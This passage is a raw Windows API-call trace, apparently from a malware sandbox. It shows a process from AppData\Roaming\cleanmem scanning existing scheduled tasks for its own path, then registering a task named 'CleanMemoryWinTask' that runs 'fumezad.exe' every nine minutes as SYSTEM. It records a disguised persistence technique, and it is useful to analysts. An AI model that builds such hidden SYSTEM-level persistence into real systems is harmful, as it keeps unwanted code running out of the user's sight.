InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n") returned 0x0 [0138.249] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.249] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.249] IUnknown:Release (This=0x126f40) returned 0x0 [0138.249] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.251] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.251] IUnknown:Release (This=0x126f40) returned 0x0 [0138.251] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.251] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.251] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.253] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.253] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0138.253] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="Calibration Loader") returned 0x0 [0138.253] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0138.290] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.291] IUnknown:Release (This=0x1270b0) returned 0x0 [0138.291] IUnknown:Release (This=0x126f50) returned 0x0 [0138.291] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.292] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.292] IUnknown:Release (This=0x126f50) returned 0x0 [0138.292] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.292] IUnknown:Release (This=0x126d50) returned 0x0 [0138.292] TaskScheduler:IUnknown:Release (This=0x126cd0) returned 0x0 [0138.292] ITaskFolderCollection:get_Item (in: This=0x126b90, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x126cd0) returned 0x0 [0138.292] ITaskFolder:GetTasks (in: This=0x126cd0, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126d60) returned 0x0 [0138.294] IRegisteredTaskCollection:get_Count (in: This=0x126d60, pCount=0x24dd60 | out: pCount=0x24dd60*=1) returned 0x0 [0138.294] IRegisteredTaskCollection:get_Item (in: This=0x126d60, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126eb0) returned 0x0 [0138.294] IRegisteredTask:get_Name (in: This=0x126eb0, pName=0x24dc10 | out: pName=0x24dc10*="MP Scheduled Scan") returned 0x0 [0138.294] IRegisteredTask:get_Xml (in: This=0x126eb0, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n") returned 0x0 [0138.297] StrStrIW (lpFirst="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.297] IUnknown:Release (This=0x126eb0) returned 0x0 [0138.297] IUnknown:Release (This=0x126d60) returned 0x0 [0138.297] ITaskFolder:GetFolders (in: This=0x126cd0, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126d60) returned 0x0 [0138.299] ITaskFolderCollection:get_Count (in: This=0x126d60, pCount=0x24dd78 | out: pCount=0x24dd78*=0) returned 0x0 [0138.299] IUnknown:Release (This=0x126d60) returned 0x0 [0138.299] TaskScheduler:IUnknown:Release (This=0x126cd0) returned 0x0 [0138.299] IUnknown:Release (This=0x126b90) returned 0x0 [0138.299] TaskScheduler:IUnknown:Release (This=0x126b20) returned 0x0 [0138.299] ITaskFolderCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0xfffffffffffffffe), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x126b20) returned 0x0 [0138.299] ITaskFolder:GetTasks (in: This=0x126b20, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126bc0) returned 0x0 [0138.301] IRegisteredTaskCollection:get_Count (in: This=0x126bc0, pCount=0x24def0 | out: pCount=0x24def0*=1) returned 0x0 [0138.301] IRegisteredTaskCollection:get_Item (in: This=0x126bc0, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dd80 | out: ppRegisteredTask=0x24dd80*=0x126d20) returned 0x0 [0138.301] IRegisteredTask:get_Name (in: This=0x126d20, pName=0x24dda0 | out: pName=0x24dda0*="SvcRestartTask") returned 0x0 [0138.301] IRegisteredTask:get_Xml (in: This=0x126d20, pXml=0x24dd88 | out: pXml=0x24dd88*="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n") returned 0x0 [0138.304] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.304] IUnknown:Release (This=0x126d20) returned 0x0 [0138.304] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.304] ITaskFolder:GetFolders (in: This=0x126b20, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126bc0) returned 0x0 [0138.306] ITaskFolderCollection:get_Count (in: This=0x126bc0, pCount=0x24df08 | out: pCount=0x24df08*=0) returned 0x0 [0138.306] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.306] TaskScheduler:IUnknown:Release (This=0x126b20) returned 0x0 [0138.306] ITaskFolderCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0xfffffffffffffffe), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x126b20) returned 0x0 [0138.306] ITaskFolder:GetTasks (in: This=0x126b20, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126b90) returned 0x0 [0138.307] IRegisteredTaskCollection:get_Count (in: This=0x126b90, pCount=0x24def0 | out: pCount=0x24def0*=0) returned 0x0 [0138.307] IUnknown:Release (This=0x126b90) returned 0x0 [0138.307] ITaskFolder:GetFolders (in: This=0x126b20, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126b90) returned 0x0 [0138.308] ITaskFolderCollection:get_Count (in: This=0x126b90, pCount=0x24df08 | out: pCount=0x24df08*=0) returned 0x0 [0138.308] IUnknown:Release (This=0x126b90) returned 0x0 [0138.308] TaskScheduler:IUnknown:Release (This=0x126b20) returned 0x0 [0138.308] IUnknown:Release (This=0x126a50) returned 0x0 [0138.309] AllocateAndInitializeSid (in: pIdentifierAuthority=0x24d960, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x24d980 | out: pSid=0x24d980*=0x442ad0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0138.309] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x442ad0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x24dc40, cchName=0x24e098, ReferencedDomainName=0x24da40, cchReferencedDomainName=0x24e088, peUse=0x24d998 | out: Name="SYSTEM", cchName=0x24e098, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x24e088, peUse=0x24d998) returned 1 [0138.310] GetLocalTime (in: lpSystemTime=0x24d968 | out: lpSystemTime=0x24d968*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x2a, wSecond=0x20, wMilliseconds=0xf7)) [0138.310] SystemTimeToFileTime (in: lpSystemTime=0x24d968, lpFileTime=0x24d990 | out: lpFileTime=0x24d990) returned 1 [0138.310] FileTimeToSystemTime (in: lpFileTime=0x24d990, lpSystemTime=0x24d968 | out: lpSystemTime=0x24d968) returned 1 [0138.310] ITaskFolder:RegisterTask (in: This=0x125a50, Path="CleanMemoryWinTask", XmlText="\n\n\n1.0.0\nAuthorNameClean memory Windows task\n\n\n\ntrue\n\n\n\nPT9M\nP415DT14H23M\nfalse\n\n2019-02-06T16:43:32\ntrue\n\n\n\n\nHighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n\n\n\nIgnoreNew\nfalse\nfalse\nfalse\ntrue\nfalse\n\ntrue\nfalse\n\ntrue\ntrue\ntrue\nfalse\nfalse\nPT0S\n\n\n\nC:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\n\n\n\n", flags=6, UserId=0x24e1c0*(varType=0x8, wReserved1=0x24, wReserved2=0x0, wReserved3=0x0, varVal1="SYSTEM", varVal2=0x8f00018e), password=0x24e260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x24e0d8), LogonType=5, sddl=0x24e2a0*(varType=0x0, wReserved1=0x8b6e, wReserved2=0x8bac, wReserved3=0x70dd, varVal1=0x7fefeff6cd0, varVal2=0x8), ppTask=0x24e0d0 | out: ppTask=0x24e0d0*=0x126a50) returned 0x0 [0138.596] ITaskFolder:GetTasks (in: This=0x125a50, flags=1, ppTasks=0x24df20 | out: ppTasks=0x24df20*=0x126b00) returned 0x0 [0138.602] IRegisteredTaskCollection:get_Count (in: This=0x126b00, pCount=0x24e080 | out: pCount=0x24e080*=5) returned 0x0 [0138.602] IRegisteredTaskCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x449cf8), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126bc0) returned 0x0 [0138.602] IRegisteredTask:get_Name (in: This=0x126bc0, pName=0x24df30 | out: pName=0x24df30*="Adobe Flash Player Updater") returned 0x0 [0138.602] IRegisteredTask:get_Xml (in: This=0x126bc0, pXml=0x24df18 | out: pXml=0x24df18*="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n") returned 0x0 [0138.608] StrStrIW (lpFirst="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.608] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.608] IRegisteredTaskCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0x449cf8), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126bc0) returned 0x0 [0138.608] IRegisteredTask:get_Name (in: This=0x126bc0, pName=0x24df30 | out: pName=0x24df30*="CleanMemoryWinTask") returned 0x0 [0138.608] IRegisteredTask:get_Xml (in: This=0x126bc0, pXml=0x24df18 | out: pXml=0x24df18*="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n") returned 0x0 [0138.613] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n" [0138.613] lstrcmpW (lpString1="CleanMemoryWinTask", lpString2="CleanMemoryWinTask") returned 0 [0138.614] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n", lpSrch="SYSTEM") returned="SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n" [0138.614] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.614] IRegisteredTaskCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0x449cf8), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126bc0) returned 0x0 [0138.614] IRegisteredTask:get_Name (in: This=0x126bc0, pName=0x24df30 | out: pName=0x24df30*="GoogleUpdateTaskMachineCore") returned 0x0 [0138.614] IRegisteredTask:get_Xml (in: This=0x126bc0, pXml=0x24df18 | out: pXml=0x24df18*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x